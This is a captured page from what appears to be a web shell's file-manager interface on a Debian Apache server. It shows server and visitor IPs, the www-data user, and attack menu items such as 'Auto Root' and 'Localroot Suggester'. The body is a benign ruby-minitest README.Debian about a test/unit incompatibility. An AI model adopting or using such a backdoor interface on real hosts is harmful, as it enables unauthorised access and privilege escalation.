Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
ruby-minitest /
Delete
Unzip
Name
Size
Permission
Date
Action
README.Debian
1.54
KB
-rw-r--r--
2015-12-17 22:23
README.rdoc.gz
8.83
KB
-rw-r--r--
2016-05-20 04:59
changelog.Debian.gz
2.04
KB
-rw-r--r--
2016-06-01 23:24
changelog.gz
12.51
KB
-rw-r--r--
2016-05-20 04:59
copyright
1.39
KB
-rw-r--r--
2016-06-01 22:33
Save
Rename
The version of minitest provided by this package breaks the test/unit version bundled with the Ruby interpreter. Requiring "test/unit" with the ruby-minitest installed causes error messages like: Warning: you should require 'minitest/autorun' instead. Warning: or add 'gem "minitest"' before 'require "minitest/autorun"' /usr/lib/ruby/2.1.0/test/unit.rb:1:in `<top (required)>' MiniTest::Unit::TestCase is now Minitest::Test. From /usr/lib/ruby/2.1.0/test/unit/testcase.rb:8:in `<module:Unit>' /usr/lib/ruby/2.1.0/test/unit.rb:676:in `<class:Runner>': undefined method `_run_suite' for class `Test::Unit::Runner' (NameError) from /usr/lib/ruby/2.1.0/test/unit.rb:261:in `<module:Unit>' from /usr/lib/ruby/2.1.0/test/unit.rb:15:in `<module:Test>' from /usr/lib/ruby/2.1.0/test/unit.rb:7:in `<top (required)>' from /usr/lib/ruby/2.1.0/rubygems/core_ext/kernel_require.rb:55:in `require' from /usr/lib/ruby/2.1.0/rubygems/core_ext/kernel_require.rb:55:in `require' The problem is due to the fact that the interpreter's version of test/unit is a compatibility layer with the version of minitest bundled with the interpreter, which is hidden once the ruby-minitest package is installed. The version of this package is not compatible with this compatibility layer. To remedy this problem, install the ruby-test-unit package, providing a more complete version of test/unit. This will hide the interpreter's version of test/unit, and avoid to rely on minitest. -- Cédric Boutillier <boutil@debian.org> Wed, 29 Apr 2015 10:06:57 +0200